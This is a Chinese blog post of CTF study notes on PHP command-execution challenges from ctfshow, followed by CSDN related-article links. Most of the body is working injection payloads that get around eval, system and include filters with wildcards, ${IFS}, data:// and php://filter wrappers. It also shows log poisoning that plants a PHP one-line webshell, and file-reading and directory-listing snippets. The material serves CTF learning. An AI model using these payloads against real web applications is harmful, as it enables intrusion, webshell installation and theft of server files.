CTF Web入门 命令执行 笔记

最新推荐文章于 2024-05-24 14:09:17 发布
最新推荐文章于 2024-05-24 14:09:17 发布
阅读量680 收藏 3
点赞数 1
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57162109/article/details/127480502
版权

CTF Web入门

命令执行

eval(读取命令),但各种字符被ban

if(!pregmatch("...",$c)) #指过滤了...
	eval($c);

这时候可以尝试

?c=system("ls"); 
?c=system("cp flag.php 1.txt"); 
1.txt

若屏蔽了flag/php/“”/system

?c=`cp fla?.??? 1.txt`; #反引号类似于system作用,

若屏蔽了.

?c=eval($_GET[1]);/?> &1=system("tac flag.php");

使用跳板1逃逸了对于c的正则判断

若屏蔽了()

或者可以使用include、require用文件包含解决

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php #%0a是换行符

include($),但flag/php被ban

if(!pregmatch("/flag/i",$c)){
  include($c);
  echo $flag;
}

使用data伪协议

?c=data://text/plain,<?php system("mv fla*.php 1.txt")?>

为什么不能用

php://filter/convert.base64-encode/resource=flag.php

因为题目过滤了flag

若过滤了php

这时候就要使用短标签绕过

?c=data://text/plain,<?=system("cp fla*.*** 1.txt")?>

system(“shell命令”),但各种字符被ban

if(!pregmatch("...",$c))
	system($c."	>dev/null 2>&1");#后面这串奇怪的东西是让你执行的结果不显示

这里可以使用双写绕过

?c=tac%20/%09flag.php&&/;/||ls

如果空格/tab/flag/&全部被过滤了,就要使用一种不用空格的读取命令

?c=nl<fla''g.php||ls

这里因为不支持通配,故利用shell特性’‘分隔字符串,执行时’‘会自动忽略

如果<也被ban了怎么办?

如果有$ 的话可以使用${IFS},它代表空格/tab/换行

?c=mv${IFS}fla?.php${IFS}a.txt%7C%7Cls

eval(读取命令),但有些读取命令被ban

$c=$_POST['c'];
eval($c);

尝试各种系统读取文件的方法

#POST:
c=system();	echo shell_exec();	file_get_contents("*.php");
highlight_file();	show_source();
c=echo include($_GET[1]); 
#这时候在GET添加?1=php://filter/convert.base64-encode/resource=flag.php	
#也可以用日志注入?1=/var/log/nginx/access.log 在User-Agent添加一句话木马<?php eval($_POST[a]);?>
#如果你确定变量名为flag的话
c=include("flag.php");echo $flag;
c=include("flag.php");var_dump(get_defined_vars());
#再或者
c=$curl = curl_init();
//设置url
curl_setopt($curl, CURLOPT_URL, 'file:///var/www/html/flag.php');
// 不返回HTTP头部信息
curl_setopt($curl, CURLOPT_HEADER, false);
// 设置获取的信息以文件流的形式返回
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// 执行命令
$data = curl_exec($curl);
//防止返回结果数据中文乱码
$data =mb_convert_encoding($data , 'UTF-8', 'UTF-8,GBK,GB2312,BIG5');
// 关闭URL请求
curl_close($curl);
// 显示获得的数据
print_r($data);

这里补充几种扫描目录并打印的方法

c=var_dump(scandir('.'));//扫描当前目录
c=var_dump(scandir('../'));//扫描上一级目录
c=var_dump(scandir('/'));//扫描根目录
c=print_r(scandir('/'));
#如果没有读权限了,试试GLOBAL协议
c=$a="glob:///*.txt"; //glob:// /*.txt
	if($b=opendir($a)){
    while(($file=readdir($b))!==false){
      echo "filename:".$file."\n";
    }
    closedir($b);
  }

来自ctfshow群主大菜鸡录制的web入门命令执行系列视频
视频移步CTFshow的个人空间_哔哩哔哩_bilibili

stopAtEntry
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 2300
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
ctfshow-web入门——命令执行(1)(web29-web40)
m0_62905745的博客
03-16 830
本篇文章是ctfshow的web入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
CTF之代码/命令执行
m0_62102520的博客
07-13 299
1.命令执行介绍 2.命令执行原理 3.代码执行介绍
CTFWEB 代码执行&命令执行&CTFSHOW wp
m0_48736242的博客
10-02 2015
CTFWEB 代码执行&命令执行&CTFSHOW wp
CTF-命令执行
Luodehahajiang的博客
07-03 1604
ctf 命令执行 命令执行函数 命令执行绕过方法
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CTF入门笔记(请大家看看)
02-25
CTF入门笔记(请大家看看)
CTF Web各种题目的解题姿势
07-27
第2章 代码执行命令执行 课时1:代码执行介绍49'32 课时2:命令执行介绍20'14 课时3:命令执行分类20'12 课时4:命令执行技巧24'30 课时5:长度限制的命令执行25'46 课时6:无数字和字母命令执行10'27 第3章...
CTF入门到提升教学视频
01-28
CTF能够锻炼选手对一些漏洞的理解能力,对安全研究、渗透测试也有一定的作用。越来越多的企业招聘安全从业人员时都会对CTF有一定的要求。
16.CTF-web安全-命令执行
woo233的博客
09-29 931
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。
CTFshow Web入门 命令执行
m0_62905261的博客
05-01 1119
CTFshow Web入门 命令执行
CTFHub | eval执行
尼泊罗河伯的博客
04-19 1194
eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。
ctf新手总结--web做题
Martin-share的博客
10-24 1569
ctf新手总结--web做题
【全开源】多场馆场地预定小程序源码(ThinkPHP+FastAdmin+UniApp)
最新发布
u011092458的博客
05-24 217
一款基于ThinkPHP+FastAdmin+UniApp开发的多场馆场地预定小程序,提供运动场馆运营解决方案,适用于体育馆、羽毛球馆、兵乒球馆、篮球馆、网球馆等场馆。
如何构建基因单倍型网络
hgz2020的博客
05-18 642
单倍型分析
PHP反射API与接口的动态分析
APItesterCris的博客
05-22 284
PHP的反射(Reflection)API 提供了一种在运行时获取类和对象信息的能力,包括类的方法、属性、接口等。这对于动态分析、构建IDE的自动完成功能、或者进行复杂的元编程非常有用。以下是如何使用PHP反射API进行动态分析的示例代码。
Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1114
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
uniapp高校二手书交易商城回收系统 微信小程序python+java+node.js+php
QQ1304979694的博客
05-24 265
每年因为有大量的学生在接受教育,每到大学毕业季的时候,所使用的大量书籍对他们自己来说,很多是没有用,同时由于书籍多和不方便携带,导致很多大学生在毕业时将教材直接丢弃是在校大学生处理已用教材的一种主要方式。基于上述因素,同时随着校园环保热潮、倡导绿色校园等号召兴起,所以设立二手书交易小程序是很必要的,一个可以提供给想将书卖出去的人,以及想购买二手书的学生一个平台,方便更好的进行资源再利用、减轻学生的经济负担、促进高校二手书的流通,共建绿色校园。开发出一种实用性强,可靠性好,操作便捷的校园二手书交易小程序。
ctfshow web入门命令执行
09-05
CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值